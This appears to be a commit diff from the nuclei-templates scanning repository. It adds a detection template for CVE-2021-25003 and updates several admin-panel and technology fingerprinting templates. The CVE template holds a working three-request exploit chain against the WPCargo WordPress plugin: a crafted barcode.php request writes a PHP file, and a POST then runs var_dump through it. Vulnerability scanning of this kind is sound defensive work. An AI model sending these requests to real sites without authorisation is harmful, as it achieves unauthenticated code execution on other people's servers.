Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

.new-additions

@@ -1,3 +1,4 @@
+cves/2021/CVE-2021-25003.yaml
 cves/2021/CVE-2021-40661.yaml
 cves/2022/CVE-2022-22242.yaml
 cves/2022/CVE-2022-38870.yaml
@@ -14,6 +15,7 @@ exposed-panels/labkey-server-login.yaml
 exposed-panels/nginx-admin-panel.yaml
 exposed-panels/nginx-ui-dashboard.yaml
 exposed-panels/nport-web-console.yaml
+exposed-panels/ourmgmt3-panel.yaml
 exposed-panels/xiaomi-wireless-router-login.yaml
 exposed-panels/xnat-login.yaml
 misconfiguration/ampache-update-exposure.yaml

cves/2021/CVE-2021-25003.yaml

@@ -0,0 +1,51 @@
+id: CVE-2021-25003
+
+info:
+  name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
+  author: theamanrawat
+  severity: critical
+  description: |
+    The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
+  reference:
+    - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
+    - https://wordpress.org/plugins/wpcargo/
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25003
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2021-25003
+    cwe-id: CWE-434
+  metadata:
+    verified: "true"
+  tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        2={{md5(num)}}
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 != 200"
+          - "status_code_2 == 200"
+          - "status_code_3 == 200"
+          - "contains(body_3, md5(num))"
+          - "contains(body_3, 'PNG')"
+        condition: and

exposed-panels/fortinet/fortios-panel.yaml

@@ -1,32 +1,37 @@
 id: fortios-panel
 
 info:
-  name: FortiOs Exposed Panel
-  author: canberbamber
+  name: Fortios Exposed Panel
+  author: canberbamber,Jna1
   severity: info
+  description: |
+    admin portal of fortios devices
+  reference:
+    - https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
   metadata:
     verified: true
     shodan-query: http.favicon.hash:945408572
   tags: panel,fortinet,fortios
 
+
 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/remote/login?lang=en"
+  - raw:
+      - |
+        GET /api/v2/cmdb/system/admin/admin HTTP/1.1
+        Host: {{Hostname}}
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
-          - "<title>Please Login</title>"
-          - "Launch FortiClient"
-        condition: and
+          - '/remote/login'
 
       - type: word
         part: header
         words:
-          - "text/html"
+          - 'Server: xxxxxxxx-xxxxx'
 
       - type: status
         status:
-          - 200
+          - 403

exposed-panels/key-cloak-admin-panel.yaml

@@ -4,6 +4,9 @@ info:
   name: Keycloak Admin Panel
   author: incogbyte,righettod
   severity: info
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-1105083093
   tags: panel,keycloak
 
 requests:
@@ -12,13 +15,18 @@ requests:
       - "{{BaseURL}}/auth/admin/master/console/"
       - "{{BaseURL}}/auth/admin"
 
+    stop-at-first-match: true
     host-redirects: true
     max-redirects: 2
+    matchers-condition: and
     matchers:
-
       - type: word
+        part: body
         words:
           - "<a href=\"http://www.keycloak.org\">"
           - "keycloak"
-        part: body
         condition: or
+
+      - type: status
+        status:
+          - 200

exposed-panels/ourmgmt3-panel.yaml

@@ -0,0 +1,28 @@
+id: ourmgmt3-panel
+
+info:
+  name: OurMGMT3 Admin Panel
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.title:"OurMGMT3"
+  tags: panel,ourmgmt3
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+      - '{{BaseURL}}/admin/login'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'OurMGMT3 Debug client'
+
+      - type: status
+        status:
+          - 200

technologies/geo-webserver-detect.yaml

@@ -1,10 +1,11 @@
-id: geo-webserver
+id: geo-webserver-detect
 
 info:
   name: GeoWebServer Detector
-  author: dhiyaneshDK
+  author: dhiyaneshDK,daffainfo
   severity: info
   metadata:
+    verified: true
     shodan-query: http.title:"GeoWebServer"
   tags: panel,geowebserver
 
@@ -22,3 +23,10 @@ requests:
       - type: word
         words:
           - "<TITLE>GeoWebServer</TITLE>"
+
+    extractors:
+      - type: regex
+        part: header
+        group: 1
+        regex:
+          - 'Server: GeoWebServer ([0-9.]+)'

workflows/geowebserver-workflow.yaml

@@ -6,6 +6,6 @@ info:
   description: A simple workflow that runs all GeoWebServer related nuclei templates on a given target.
 
 workflows:
-  - template: technologies/geo-webserver.yaml
+  - template: technologies/geo-webserver-detect.yaml
     subtemplates:
       - tags: geowebserver